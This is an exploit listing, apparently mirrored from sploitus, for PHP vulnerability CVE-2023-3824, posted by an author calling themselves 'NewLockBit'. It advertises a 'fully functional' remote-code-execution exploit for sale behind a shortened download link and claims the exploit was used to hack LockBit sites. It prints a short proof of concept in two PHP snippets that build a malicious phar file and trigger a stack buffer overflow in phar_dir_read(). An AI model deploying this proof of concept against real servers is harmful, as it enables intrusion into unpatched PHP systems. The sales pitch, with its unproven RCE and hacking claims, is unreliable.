## https://sploitus.com/exploit?id=6B29914E-52A6-5D94-9AB1-956F0861F9F9
# CVE-2023-3824-PHP-to-RCE-LockBit-LEAK
Greetings to anyone interested in how several LockBit sites were hacked by PHP CVE-2023-3824.
(**download exploit** below)
Now I write this POC in Python 3.9. This POC is fully finalized and functional. I'm willing to share this exploit for a nominal fee to avoid mass distribution and hacking of most sites written in PHP.
## Download
[Download here](https://t.ly/akOKg)
This repository contain instructions for running it, a description of the vulnerability, payload in php 8.0 and the exploit.py in Python 3.9.
## What happened (About POC)
Below is a screenshot of what I am talking about.
At the link you can read about how it went down.
(https://www.thestack.technology/coalition-calls-time-on-lockbit-ransomware-gang/)
## Details of CVE-2023-3824
CVE-2023-3824 was found in PHP version 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or **RCE**.
This vulnerability works due to buffer overflow and overread in phar_dir_read() function.
I have written a POC. Here is a short version of it:
### PoC
Create the malicious Phar file using:
```
<?php
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>
```
Trigger the buffer overflow and overread using this script:
```
<?php
$handle = opendir("phar://./malicious.phar");
$x = readdir($handle);
closedir($handle);
var_dump($x);
?>
```
Author: NewLockBit
Date of published: 2024/03/09